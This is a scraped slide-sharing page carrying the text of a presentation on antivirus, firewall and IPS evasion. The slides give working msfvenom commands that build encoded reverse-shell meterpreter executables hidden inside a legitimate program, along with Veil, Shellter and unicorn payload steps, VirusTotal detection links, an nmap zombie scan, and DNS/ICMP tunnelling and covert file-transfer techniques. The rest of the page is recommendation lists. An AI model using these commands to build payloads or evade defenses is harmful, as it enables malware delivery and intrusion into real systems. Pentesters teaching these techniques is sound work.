際際滷

際際滷Share a Scribd company logo

EvasionTechniques

Candan BOLUKBAS
Candan BOLUKBAS

This document discusses various techniques for evading antivirus, firewalls, and intrusion prevention systems (IPS). It begins with techniques for antivirus evasion using tools like msfvenom, veil-evasion, shellter, and unicorn to obfuscate payloads. Next it discusses firewall and IPS evasion techniques like stage encoding/encryption, zombie scanning, tunneling over protocols like ICMP, DNS, and using a custom Tor configuration. The document provides examples and links to demonstrate these evasion techniques.

1 of 24
Downloaded 77 times
Antivirus, Firewall, and IPS Evasion Techniques CANDAN BOLUKBAS BY NORMSHIELD SECURITY
Candan BOLUKBAS CTO of NormShield Security, Inc. Computer Engineering BS 5+ Network & Security Admin, 5+ Pentester CCNA, CCNP, CEH, LPT, MCP, CHFI, ECIH, ECSP candan.bolukbas@normshield.com @candanbolukbas @NormShield
Agenda Anti-Virus Evasion Techniques msfvenom veil-evasion shellter unicorn metload Firewall | IPS Evasion Techniques Stage Encoding / Encryption Zombie scan Tunneling Custom SOCKS proxy Promiscuous transfer
msfvenom -p windows/meterpreter/reverse_tcp LHOST=172.16.52.211 LPORT=443 -f exe -o rev_tcp_211_442.exe https://www.virustotal.com/en/file/df5433d6d23fe2dd87a75c9e402233f37ee3bd4f413fc60aabf0e6428dd48127/analysis/1471898471/
msfvenom -p windows/meterpreter/reverse_tcp LHOST=172.16.52.211 LPORT=443 -e x86/shikata_ga_nai -i 11 -x ZoomIt.exe -f exe -o rev_tcp_shikata_211_443.exe https://www.virustotal.com/en/file/9bc6fc56f936adce7d9bf5582b283a139dad82d4955bf4c8883c3619fb83cf73/analysis/147189938/
msfvenom -p windows/meterpreter/reverse_tcp LHOST=172.16.52.211 LPORT=443 - e x86/shikata_ga_nai -i 11 -f raw | msfvenom -a x86 --platform windows -e x86/countdown -i 13 -f raw | msfvenom -a x86 --platform windows -e x86/shikata_ga_nai -i 6 -f exe -x ZoomIt.exe -o rev_tcp_multiple_211_443.exe https://www.virustotal.com/en/file/d8b9f086aefb89d1e05bc0e86a254570430af6ae844e1336d7ce4d7aaceb73bd/analysis/1471899934
Veil-evasion => c/meterpreter/rev_tcp https://www.virustotal.com/en/file/e8ec8d881ce7b99aa2436c5d277816861714414f23505333a8ad15b56cec0627/analysis/1471900386/
Veil-evasion => python/shellcode_inject/aes_encrypt https://www.virustotal.com/en/file/597e54d213f9d9d84aa710247e7caa6cadf7f686fb4968fdded9eacd7d3f4e5c/analysis/1471902312/
Shellter => auto & buitlin meterpreter payload https://www.virustotal.com/en/file/bdb1e245fb0ab720353bc249648769a1a54c681ba5727d15c2ef1072ec0993e0/analysis/1471903783/
Shellter => auto & custom multi encode meterpreter payload https://www.virustotal.com/en/file/80a7124e2fc6e496d03eef0ea6a3912a13dbe3240510be12b7394230e043e56f/analysis/1471904502/
./unicorn.py windows/meterpreter/reverse_tcp 172.16.52.211 443 macro https://www.virustotal.com/en/file/5745d2856e4b1e47f8946f0c272b278fb25ef56d7a5bd43657fb0a41882fcdb2/analysis/1471905607/
./autometload.py 2 172.16.52.211 443 https://www.virustotal.com/en/file/25dd87d068b879839f7625c50af4a3adbfc9defc21a6d7455539d0cb6c916749/analysis/1471905916/
EvasionTechniques
Stage Encoding & Encryption https://github.com/DiabloHorn/undetected-meterpreter-stagers
nmap -sI 172.16.52.205:445 172.16.52.204 --top-ports
Basics L2 Ethernet : ~28 byte (RFC 894) L3 IP : 20 byte (RFC 791) L4 TCP / UDP: ~20 60 byte (RFC 793 / 768) L7 HTTP, SSH, DNS Wireshark MAC IP TCP / UDP HTTP / FTP / DNS Layer #2 Layer #3 Layer #3 Layer #5-7
What is protocol tunnelling? Basicallytransporting a protocolinside another protocollike GRE (IP protocol 47) which transportsother IP protocolslike IPv4 (protocol 4), TCP (protocol6) etc. For instance:a DNS package looks like below: +------------------------------------------------------------+ | MAC | IP | UDP | DNS | Data :::::::::::::::::::::::::::::: | +------------------------------------------------------------+ If we use DNS as the transport protocol,we can place a TCP package in the following way : +------------------------------------------------------------+ | MAC | IP | UDP | DNS | | IP | TCP | HTTP | Data :::::::::| | +------------------------------------------------------------+
Basic Tunnelling Generic Routing Encapsulation (GRE) is a tunneling protocol developed by Cisco Systems that can encapsulate a wide variety of network layer protocols inside virtual point- to-point links over an Internet Protocol network. [Wikipedia] MAC IP GRE IP ICMP DATA
IP over ICMP IP over DNS DNS Tunnel capable malware Tunnelling demos ICMP172.16.52.203 172.16.52.216 HTTP Internet DNS172.16.52.216 Local DNS Server DNS InternetAuth. DNS Server HTTP DNS172.16.52.216 Local DNS Server DNS InternetAuth. DNS Server HTTP C&CHTTP
DNS Tunnel
DNS Tunnel capable malware
Custom Tor Configurations meek is a pluggable transport, an obfuscation layer for Tor designed to evade Internet censorship. Whonix is an operating system focused on anonymity, privacy and security. It's based on the Tor anonymity network, Debian and security by isolation. Tor is a connection-oriented anonymizing communication service. SocksPort:443 defines which port is going to used for SOCKS Proxy HTTPSClient Custom Tor Tor Internet GWClient Whonix Tor Internet
promisctunnel.py & hping3 172.16.52.211 -p 11111 -d 100 -E file PromiscTunnel
Client sends a file to destinations 10 different closed ports!

Recommended

Cisco ASA Firewall Interview Question "aka Stump-the-Chump" Question # 01
Cisco ASA Firewall Interview Question "aka Stump-the-Chump" Question # 01Cisco ASA Firewall Interview Question "aka Stump-the-Chump" Question # 01
Cisco ASA Firewall Interview Question "aka Stump-the-Chump" Question # 01
Duane Bodle
Free radius billing server with practical vpn exmaple
Free radius billing server with practical vpn exmapleFree radius billing server with practical vpn exmaple
Free radius billing server with practical vpn exmaple
Chanaka Lasantha
Kickstat File_Draft_ESXI5.1_Template
Kickstat File_Draft_ESXI5.1_TemplateKickstat File_Draft_ESXI5.1_Template
Kickstat File_Draft_ESXI5.1_Template
Luca Viscomi
SMTP STS (Strict Transport Security) vs. SMTP with DANE
SMTP STS (Strict Transport Security) vs. SMTP with DANESMTP STS (Strict Transport Security) vs. SMTP with DANE
SMTP STS (Strict Transport Security) vs. SMTP with DANE
Men and Mice
DNS High-Availability Tools - Open-Source Load Balancing Solutions
DNS High-Availability Tools - Open-Source Load Balancing SolutionsDNS High-Availability Tools - Open-Source Load Balancing Solutions
DNS High-Availability Tools - Open-Source Load Balancing Solutions
Men and Mice
Rete di casa e raspberry pi - Home network and Raspberry Pi
Rete di casa e raspberry pi - Home network and Raspberry Pi Rete di casa e raspberry pi - Home network and Raspberry Pi
Rete di casa e raspberry pi - Home network and Raspberry Pi
Daniele Albrizio
Basic ASA Configuration, NAT in ASA Firewall
Basic ASA Configuration, NAT in ASA Firewall Basic ASA Configuration, NAT in ASA Firewall
Basic ASA Configuration, NAT in ASA Firewall
NetProtocol Xpert
DNSSEC signing Tutorial
DNSSEC signing Tutorial DNSSEC signing Tutorial
DNSSEC signing Tutorial
Men and Mice
Using packet-tracer, capture and other Cisco ASA tools for network troublesho...
Using packet-tracer, capture and other Cisco ASA tools for network troublesho...Using packet-tracer, capture and other Cisco ASA tools for network troublesho...
Using packet-tracer, capture and other Cisco ASA tools for network troublesho...
Cisco Russia
Unidade3 roteiro proxy
Unidade3 roteiro proxyUnidade3 roteiro proxy
Unidade3 roteiro proxy
Leandro Almeida
Configure Proxy and Firewall (Iptables)
Configure Proxy and Firewall (Iptables)Configure Proxy and Firewall (Iptables)
Configure Proxy and Firewall (Iptables)
Tola LENG
Detecting and mitigating DDoS ZenDesk by Vicente De Luca
Detecting and mitigating DDoS ZenDesk by Vicente De LucaDetecting and mitigating DDoS ZenDesk by Vicente De Luca
Detecting and mitigating DDoS ZenDesk by Vicente De Luca
Pavel Odintsov
Webserver Architecture Example
Webserver Architecture ExampleWebserver Architecture Example
Webserver Architecture Example
Ohio University
More Information
More InformationMore Information
More Information
Aristotle Miranda
Nat
NatNat
Nat
Mohamed Gamel
Basic security & info
Basic security & infoBasic security & info
Basic security & info
Tola LENG
Intro to Packet Analysis - pfSense Hangout May 2014
Intro to Packet Analysis - pfSense Hangout May 2014Intro to Packet Analysis - pfSense Hangout May 2014
Intro to Packet Analysis - pfSense Hangout May 2014
Netgate
Routed IPsec on pfSense 2.4.4 - pfSense Hangout June 2018
Routed IPsec on pfSense 2.4.4 - pfSense Hangout June 2018Routed IPsec on pfSense 2.4.4 - pfSense Hangout June 2018
Routed IPsec on pfSense 2.4.4 - pfSense Hangout June 2018
Netgate
Raspberry pi 3
Raspberry pi 3Raspberry pi 3
Raspberry pi 3
Sanket Kakde
Network Security
Network SecurityNetwork Security
Network Security
UTD Computer Security Group
Setting up Cisco WSA Proxy in Transparent and Explicit Mode
Setting up Cisco WSA Proxy in Transparent and Explicit ModeSetting up Cisco WSA Proxy in Transparent and Explicit Mode
Setting up Cisco WSA Proxy in Transparent and Explicit Mode
Dhruv Sharma
Squid, SquidGuard, and Lightsquid - pfSense Hangout March 2014
Squid, SquidGuard, and Lightsquid - pfSense Hangout March 2014Squid, SquidGuard, and Lightsquid - pfSense Hangout March 2014
Squid, SquidGuard, and Lightsquid - pfSense Hangout March 2014
Netgate
Linux Security Crash Course
Linux Security Crash CourseLinux Security Crash Course
Linux Security Crash Course
UTD Computer Security Group
CSIRT_16_Jun
CSIRT_16_JunCSIRT_16_Jun
CSIRT_16_Jun
Candan BOLUKBAS
Network secuirty & encryption techniques
Network secuirty & encryption techniquesNetwork secuirty & encryption techniques
Network secuirty & encryption techniques
manoj kumar
(130216) #fitalk potentially malicious ur ls
(130216) #fitalk potentially malicious ur ls(130216) #fitalk potentially malicious ur ls
(130216) #fitalk potentially malicious ur ls
INSIGHT FORENSIC
Spo2 t19 spo2-t19
Spo2 t19 spo2-t19Spo2 t19 spo2-t19
Spo2 t19 spo2-t19
SelectedPresentations
Desofuscando um webshell em php h2hc Ed.9Desofuscando um webshell em php h2hc Ed.9
Desofuscando um webshell em php h2hc Ed.9
Ricardo L0gan
Intrusion detection and prevention
Intrusion detection and preventionIntrusion detection and prevention
Intrusion detection and prevention
Nicholas Davis
Applying Anti-Reversing Techniques to Machine Code
Applying Anti-Reversing Techniques to Machine CodeApplying Anti-Reversing Techniques to Machine Code
Applying Anti-Reversing Techniques to Machine Code
Teodoro Cipresso

More Related Content

What's hot (15)

Using packet-tracer, capture and other Cisco ASA tools for network troublesho...
Using packet-tracer, capture and other Cisco ASA tools for network troublesho...Using packet-tracer, capture and other Cisco ASA tools for network troublesho...
Using packet-tracer, capture and other Cisco ASA tools for network troublesho...
Cisco Russia
Unidade3 roteiro proxy
Unidade3 roteiro proxyUnidade3 roteiro proxy
Unidade3 roteiro proxy
Leandro Almeida
Configure Proxy and Firewall (Iptables)
Configure Proxy and Firewall (Iptables)Configure Proxy and Firewall (Iptables)
Configure Proxy and Firewall (Iptables)
Tola LENG
Detecting and mitigating DDoS ZenDesk by Vicente De Luca
Detecting and mitigating DDoS ZenDesk by Vicente De LucaDetecting and mitigating DDoS ZenDesk by Vicente De Luca
Detecting and mitigating DDoS ZenDesk by Vicente De Luca
Pavel Odintsov
Webserver Architecture Example
Webserver Architecture ExampleWebserver Architecture Example
Webserver Architecture Example
Ohio University
More Information
More InformationMore Information
More Information
Aristotle Miranda
Nat
NatNat
Nat
Mohamed Gamel
Basic security & info
Basic security & infoBasic security & info
Basic security & info
Tola LENG
Intro to Packet Analysis - pfSense Hangout May 2014
Intro to Packet Analysis - pfSense Hangout May 2014Intro to Packet Analysis - pfSense Hangout May 2014
Intro to Packet Analysis - pfSense Hangout May 2014
Netgate
Routed IPsec on pfSense 2.4.4 - pfSense Hangout June 2018
Routed IPsec on pfSense 2.4.4 - pfSense Hangout June 2018Routed IPsec on pfSense 2.4.4 - pfSense Hangout June 2018
Routed IPsec on pfSense 2.4.4 - pfSense Hangout June 2018
Netgate
Raspberry pi 3
Raspberry pi 3Raspberry pi 3
Raspberry pi 3
Sanket Kakde
Network Security
Network SecurityNetwork Security
Network Security
UTD Computer Security Group
Setting up Cisco WSA Proxy in Transparent and Explicit Mode
Setting up Cisco WSA Proxy in Transparent and Explicit ModeSetting up Cisco WSA Proxy in Transparent and Explicit Mode
Setting up Cisco WSA Proxy in Transparent and Explicit Mode
Dhruv Sharma
Squid, SquidGuard, and Lightsquid - pfSense Hangout March 2014
Squid, SquidGuard, and Lightsquid - pfSense Hangout March 2014Squid, SquidGuard, and Lightsquid - pfSense Hangout March 2014
Squid, SquidGuard, and Lightsquid - pfSense Hangout March 2014
Netgate
Linux Security Crash Course
Linux Security Crash CourseLinux Security Crash Course
Linux Security Crash Course
UTD Computer Security Group
Using packet-tracer, capture and other Cisco ASA tools for network troublesho...
Using packet-tracer, capture and other Cisco ASA tools for network troublesho...Using packet-tracer, capture and other Cisco ASA tools for network troublesho...
Using packet-tracer, capture and other Cisco ASA tools for network troublesho...
Cisco Russia
Unidade3 roteiro proxy
Unidade3 roteiro proxyUnidade3 roteiro proxy
Unidade3 roteiro proxy
Leandro Almeida
Configure Proxy and Firewall (Iptables)
Configure Proxy and Firewall (Iptables)Configure Proxy and Firewall (Iptables)
Configure Proxy and Firewall (Iptables)
Tola LENG
Detecting and mitigating DDoS ZenDesk by Vicente De Luca
Detecting and mitigating DDoS ZenDesk by Vicente De LucaDetecting and mitigating DDoS ZenDesk by Vicente De Luca
Detecting and mitigating DDoS ZenDesk by Vicente De Luca
Pavel Odintsov
Webserver Architecture Example
Webserver Architecture ExampleWebserver Architecture Example
Webserver Architecture Example
Ohio University
More Information
More InformationMore Information
More Information
Aristotle Miranda
Nat
NatNat
Nat
Mohamed Gamel
Basic security & info
Basic security & infoBasic security & info
Basic security & info
Tola LENG
Intro to Packet Analysis - pfSense Hangout May 2014
Intro to Packet Analysis - pfSense Hangout May 2014Intro to Packet Analysis - pfSense Hangout May 2014
Intro to Packet Analysis - pfSense Hangout May 2014
Netgate
Routed IPsec on pfSense 2.4.4 - pfSense Hangout June 2018
Routed IPsec on pfSense 2.4.4 - pfSense Hangout June 2018Routed IPsec on pfSense 2.4.4 - pfSense Hangout June 2018
Routed IPsec on pfSense 2.4.4 - pfSense Hangout June 2018
Netgate
Raspberry pi 3
Raspberry pi 3Raspberry pi 3
Raspberry pi 3
Sanket Kakde
Network Security
Network SecurityNetwork Security
Network Security
UTD Computer Security Group
Setting up Cisco WSA Proxy in Transparent and Explicit Mode
Setting up Cisco WSA Proxy in Transparent and Explicit ModeSetting up Cisco WSA Proxy in Transparent and Explicit Mode
Setting up Cisco WSA Proxy in Transparent and Explicit Mode
Dhruv Sharma
Squid, SquidGuard, and Lightsquid - pfSense Hangout March 2014
Squid, SquidGuard, and Lightsquid - pfSense Hangout March 2014Squid, SquidGuard, and Lightsquid - pfSense Hangout March 2014
Squid, SquidGuard, and Lightsquid - pfSense Hangout March 2014
Netgate
Linux Security Crash Course
Linux Security Crash CourseLinux Security Crash Course
Linux Security Crash Course
UTD Computer Security Group

Viewers also liked (20)

CSIRT_16_Jun
CSIRT_16_JunCSIRT_16_Jun
CSIRT_16_Jun
Candan BOLUKBAS
Network secuirty & encryption techniques
Network secuirty & encryption techniquesNetwork secuirty & encryption techniques
Network secuirty & encryption techniques
manoj kumar
(130216) #fitalk potentially malicious ur ls
(130216) #fitalk potentially malicious ur ls(130216) #fitalk potentially malicious ur ls
(130216) #fitalk potentially malicious ur ls
INSIGHT FORENSIC
Spo2 t19 spo2-t19
Spo2 t19 spo2-t19Spo2 t19 spo2-t19
Spo2 t19 spo2-t19
SelectedPresentations
Desofuscando um webshell em php h2hc Ed.9Desofuscando um webshell em php h2hc Ed.9
Desofuscando um webshell em php h2hc Ed.9
Ricardo L0gan
Intrusion detection and prevention
Intrusion detection and preventionIntrusion detection and prevention
Intrusion detection and prevention
Nicholas Davis
Applying Anti-Reversing Techniques to Machine Code
Applying Anti-Reversing Techniques to Machine CodeApplying Anti-Reversing Techniques to Machine Code
Applying Anti-Reversing Techniques to Machine Code
Teodoro Cipresso
Binary Obfuscation from the Top Down: Obfuscation Executables without Writing...
Binary Obfuscation from the Top Down: Obfuscation Executables without Writing...Binary Obfuscation from the Top Down: Obfuscation Executables without Writing...
Binary Obfuscation from the Top Down: Obfuscation Executables without Writing...
frank2
Generic attack detection engine
Generic attack detection engineGeneric attack detection engine
Generic attack detection engine
Vikrant Kansal
Applciation footprinting, discovery and enumeration
Applciation footprinting, discovery and enumerationApplciation footprinting, discovery and enumeration
Applciation footprinting, discovery and enumeration
Blueinfy Solutions
Obfuscation, Golfing and Secret Operators in Perl
Obfuscation, Golfing and Secret Operators in PerlObfuscation, Golfing and Secret Operators in Perl
Obfuscation, Golfing and Secret Operators in Perl
Jos辿 Castro
CsirtCsirt
Csirt
Renato Basante Borbolla
Back to the CORE
Back to the COREBack to the CORE
Back to the CORE
Peter Hlavaty
Attack on the Core
Attack on the CoreAttack on the Core
Attack on the Core
Peter Hlavaty
TakeDownCon Rocket City: WebShells by Adrian Crenshaw
TakeDownCon Rocket City: WebShells by Adrian CrenshawTakeDownCon Rocket City: WebShells by Adrian Crenshaw
TakeDownCon Rocket City: WebShells by Adrian Crenshaw
EC-Council
Endpoint Security Evasion
Endpoint Security EvasionEndpoint Security Evasion
Endpoint Security Evasion
Invincea, Inc.
Deobfuscation and beyond (ZeroNights, 2014)
Deobfuscation and beyond (ZeroNights, 2014)Deobfuscation and beyond (ZeroNights, 2014)
Deobfuscation and beyond (ZeroNights, 2014)
ReCrypt
Top Tactics For Endpoint Security
Top Tactics For Endpoint SecurityTop Tactics For Endpoint Security
Top Tactics For Endpoint Security
Ben Rothke
An Introduction of SQL Injection, Buffer Overflow & Wireless Attack
An Introduction of SQL Injection, Buffer Overflow & Wireless AttackAn Introduction of SQL Injection, Buffer Overflow & Wireless Attack
An Introduction of SQL Injection, Buffer Overflow & Wireless Attack
TechSecIT
Got database access? Own the network!
Got database access? Own the network!Got database access? Own the network!
Got database access? Own the network!
Bernardo Damele A. G.
CSIRT_16_Jun
CSIRT_16_JunCSIRT_16_Jun
CSIRT_16_Jun
Candan BOLUKBAS
Network secuirty & encryption techniques
Network secuirty & encryption techniquesNetwork secuirty & encryption techniques
Network secuirty & encryption techniques
manoj kumar
(130216) #fitalk potentially malicious ur ls
(130216) #fitalk potentially malicious ur ls(130216) #fitalk potentially malicious ur ls
(130216) #fitalk potentially malicious ur ls
INSIGHT FORENSIC
Spo2 t19 spo2-t19
Spo2 t19 spo2-t19Spo2 t19 spo2-t19
Spo2 t19 spo2-t19
SelectedPresentations
Desofuscando um webshell em php h2hc Ed.9Desofuscando um webshell em php h2hc Ed.9
Desofuscando um webshell em php h2hc Ed.9
Ricardo L0gan
Intrusion detection and prevention
Intrusion detection and preventionIntrusion detection and prevention
Intrusion detection and prevention
Nicholas Davis
Applying Anti-Reversing Techniques to Machine Code
Applying Anti-Reversing Techniques to Machine CodeApplying Anti-Reversing Techniques to Machine Code
Applying Anti-Reversing Techniques to Machine Code
Teodoro Cipresso
Binary Obfuscation from the Top Down: Obfuscation Executables without Writing...
Binary Obfuscation from the Top Down: Obfuscation Executables without Writing...Binary Obfuscation from the Top Down: Obfuscation Executables without Writing...
Binary Obfuscation from the Top Down: Obfuscation Executables without Writing...
frank2
Generic attack detection engine
Generic attack detection engineGeneric attack detection engine
Generic attack detection engine
Vikrant Kansal
Applciation footprinting, discovery and enumeration
Applciation footprinting, discovery and enumerationApplciation footprinting, discovery and enumeration
Applciation footprinting, discovery and enumeration
Blueinfy Solutions
Obfuscation, Golfing and Secret Operators in Perl
Obfuscation, Golfing and Secret Operators in PerlObfuscation, Golfing and Secret Operators in Perl
Obfuscation, Golfing and Secret Operators in Perl
Jos辿 Castro
CsirtCsirt
Csirt
Renato Basante Borbolla
Back to the CORE
Back to the COREBack to the CORE
Back to the CORE
Peter Hlavaty
Attack on the Core
Attack on the CoreAttack on the Core
Attack on the Core
Peter Hlavaty
TakeDownCon Rocket City: WebShells by Adrian Crenshaw
TakeDownCon Rocket City: WebShells by Adrian CrenshawTakeDownCon Rocket City: WebShells by Adrian Crenshaw
TakeDownCon Rocket City: WebShells by Adrian Crenshaw
EC-Council
Endpoint Security Evasion
Endpoint Security EvasionEndpoint Security Evasion
Endpoint Security Evasion
Invincea, Inc.
Deobfuscation and beyond (ZeroNights, 2014)
Deobfuscation and beyond (ZeroNights, 2014)Deobfuscation and beyond (ZeroNights, 2014)
Deobfuscation and beyond (ZeroNights, 2014)
ReCrypt
Top Tactics For Endpoint Security
Top Tactics For Endpoint SecurityTop Tactics For Endpoint Security
Top Tactics For Endpoint Security
Ben Rothke
An Introduction of SQL Injection, Buffer Overflow & Wireless Attack
An Introduction of SQL Injection, Buffer Overflow & Wireless AttackAn Introduction of SQL Injection, Buffer Overflow & Wireless Attack
An Introduction of SQL Injection, Buffer Overflow & Wireless Attack
TechSecIT
Got database access? Own the network!
Got database access? Own the network!Got database access? Own the network!
Got database access? Own the network!
Bernardo Damele A. G.

Similar to EvasionTechniques (20)

CCNP Data Center Centralized Management Automation
CCNP Data Center Centralized Management AutomationCCNP Data Center Centralized Management Automation
CCNP Data Center Centralized Management Automation
E.S.G. JR. Consulting, Inc.
The Road to End-to-End Encryption in Jitsi Meet
The Road to End-to-End Encryption in Jitsi MeetThe Road to End-to-End Encryption in Jitsi Meet
The Road to End-to-End Encryption in Jitsi Meet
Sa炭l Ibarra Corretg辿
Cellular technology with Embedded Linux - COSCUP 2016
Cellular technology with Embedded Linux - COSCUP 2016Cellular technology with Embedded Linux - COSCUP 2016
Cellular technology with Embedded Linux - COSCUP 2016
SZ Lin
Building an Automated Behavioral Malware Analysis Environment using Free and ...
Building an Automated Behavioral Malware Analysis Environment using Free and ...Building an Automated Behavioral Malware Analysis Environment using Free and ...
Building an Automated Behavioral Malware Analysis Environment using Free and ...
Jim Clausing
C&C Botnet Factory
C&C Botnet FactoryC&C Botnet Factory
C&C Botnet Factory
Nullbyte Security Conference
[OpenStack 覦蠍 ろ磯] HA using DVR
[OpenStack 覦蠍 ろ磯] HA using DVR[OpenStack 覦蠍 ろ磯] HA using DVR
[OpenStack 覦蠍 ろ磯] HA using DVR
OpenStack Korea Community
What is new in neutron QoS?
What is new in neutron QoS?What is new in neutron QoS?
What is new in neutron QoS?
Sawomir Kaposki
Implementation of DNS Anycast - a case study
Implementation of DNS Anycast - a case studyImplementation of DNS Anycast - a case study
Implementation of DNS Anycast - a case study
A. S. M. Shamim Reza
Hacking the swisscom modem
Hacking the swisscom modemHacking the swisscom modem
Hacking the swisscom modem
Cyber Security Alliance
26.1.7 lab snort and firewall rules
26.1.7 lab snort and firewall rules26.1.7 lab snort and firewall rules
26.1.7 lab snort and firewall rules
Freddy Buena単o
Incident response: Advanced Network Forensics
Incident response: Advanced Network ForensicsIncident response: Advanced Network Forensics
Incident response: Advanced Network Forensics
Napier University
IP Addresses
IP AddressesIP Addresses
IP Addresses
adil raja
Cloudy with a Chance of Fireballs: Provisioning and Certificate Management in...
Cloudy with a Chance of Fireballs: Provisioning and Certificate Management in...Cloudy with a Chance of Fireballs: Provisioning and Certificate Management in...
Cloudy with a Chance of Fireballs: Provisioning and Certificate Management in...
Puppet
Unleashing the Power of Fabric Orchestrating New Performance Features for SR-...
Unleashing the Power of Fabric Orchestrating New Performance Features for SR-...Unleashing the Power of Fabric Orchestrating New Performance Features for SR-...
Unleashing the Power of Fabric Orchestrating New Performance Features for SR-...
Liz Warner
Black Hat USA 2022 - Arsenal Labs - Vehicle Control Systems - Red vs Blue
Black Hat USA 2022 - Arsenal Labs - Vehicle Control Systems - Red vs BlueBlack Hat USA 2022 - Arsenal Labs - Vehicle Control Systems - Red vs Blue
Black Hat USA 2022 - Arsenal Labs - Vehicle Control Systems - Red vs Blue
Chris Sistrunk
Handy Networking Tools and How to Use Them
Handy Networking Tools and How to Use ThemHandy Networking Tools and How to Use Them
Handy Networking Tools and How to Use Them
Sneha Inguva
Sponia with QingCloud
Sponia with QingCloudSponia with QingCloud
Sponia with QingCloud
Gong Haibing
Qemu device prototyping
Qemu device prototypingQemu device prototyping
Qemu device prototyping
Yan Vugenfirer
Feedback on Big Compute & HPC on Windows Azure
Feedback on Big Compute & HPC on Windows AzureFeedback on Big Compute & HPC on Windows Azure
Feedback on Big Compute & HPC on Windows Azure
ANEO
Null Delhi chapter - Feb 2019
Null Delhi chapter - Feb 2019Null Delhi chapter - Feb 2019
Null Delhi chapter - Feb 2019
Nikhil Raj
CCNP Data Center Centralized Management Automation
CCNP Data Center Centralized Management AutomationCCNP Data Center Centralized Management Automation
CCNP Data Center Centralized Management Automation
E.S.G. JR. Consulting, Inc.
The Road to End-to-End Encryption in Jitsi Meet
The Road to End-to-End Encryption in Jitsi MeetThe Road to End-to-End Encryption in Jitsi Meet
The Road to End-to-End Encryption in Jitsi Meet
Sa炭l Ibarra Corretg辿
Cellular technology with Embedded Linux - COSCUP 2016
Cellular technology with Embedded Linux - COSCUP 2016Cellular technology with Embedded Linux - COSCUP 2016
Cellular technology with Embedded Linux - COSCUP 2016
SZ Lin
Building an Automated Behavioral Malware Analysis Environment using Free and ...
Building an Automated Behavioral Malware Analysis Environment using Free and ...Building an Automated Behavioral Malware Analysis Environment using Free and ...
Building an Automated Behavioral Malware Analysis Environment using Free and ...
Jim Clausing
C&C Botnet Factory
C&C Botnet FactoryC&C Botnet Factory
C&C Botnet Factory
Nullbyte Security Conference
[OpenStack 覦蠍 ろ磯] HA using DVR
[OpenStack 覦蠍 ろ磯] HA using DVR[OpenStack 覦蠍 ろ磯] HA using DVR
[OpenStack 覦蠍 ろ磯] HA using DVR
OpenStack Korea Community
What is new in neutron QoS?
What is new in neutron QoS?What is new in neutron QoS?
What is new in neutron QoS?
Sawomir Kaposki
Implementation of DNS Anycast - a case study
Implementation of DNS Anycast - a case studyImplementation of DNS Anycast - a case study
Implementation of DNS Anycast - a case study
A. S. M. Shamim Reza
Hacking the swisscom modem
Hacking the swisscom modemHacking the swisscom modem
Hacking the swisscom modem
Cyber Security Alliance
26.1.7 lab snort and firewall rules
26.1.7 lab snort and firewall rules26.1.7 lab snort and firewall rules
26.1.7 lab snort and firewall rules
Freddy Buena単o
Incident response: Advanced Network Forensics
Incident response: Advanced Network ForensicsIncident response: Advanced Network Forensics
Incident response: Advanced Network Forensics
Napier University
IP Addresses
IP AddressesIP Addresses
IP Addresses
adil raja
Cloudy with a Chance of Fireballs: Provisioning and Certificate Management in...
Cloudy with a Chance of Fireballs: Provisioning and Certificate Management in...Cloudy with a Chance of Fireballs: Provisioning and Certificate Management in...
Cloudy with a Chance of Fireballs: Provisioning and Certificate Management in...
Puppet
Unleashing the Power of Fabric Orchestrating New Performance Features for SR-...
Unleashing the Power of Fabric Orchestrating New Performance Features for SR-...Unleashing the Power of Fabric Orchestrating New Performance Features for SR-...
Unleashing the Power of Fabric Orchestrating New Performance Features for SR-...
Liz Warner
Black Hat USA 2022 - Arsenal Labs - Vehicle Control Systems - Red vs Blue
Black Hat USA 2022 - Arsenal Labs - Vehicle Control Systems - Red vs BlueBlack Hat USA 2022 - Arsenal Labs - Vehicle Control Systems - Red vs Blue
Black Hat USA 2022 - Arsenal Labs - Vehicle Control Systems - Red vs Blue
Chris Sistrunk
Handy Networking Tools and How to Use Them
Handy Networking Tools and How to Use ThemHandy Networking Tools and How to Use Them
Handy Networking Tools and How to Use Them
Sneha Inguva
Sponia with QingCloud
Sponia with QingCloudSponia with QingCloud
Sponia with QingCloud
Gong Haibing
Qemu device prototyping
Qemu device prototypingQemu device prototyping
Qemu device prototyping
Yan Vugenfirer
Feedback on Big Compute & HPC on Windows Azure
Feedback on Big Compute & HPC on Windows AzureFeedback on Big Compute & HPC on Windows Azure
Feedback on Big Compute & HPC on Windows Azure
ANEO
Null Delhi chapter - Feb 2019
Null Delhi chapter - Feb 2019Null Delhi chapter - Feb 2019
Null Delhi chapter - Feb 2019
Nikhil Raj

EvasionTechniques

AboutCopyright
息 2025 際際滷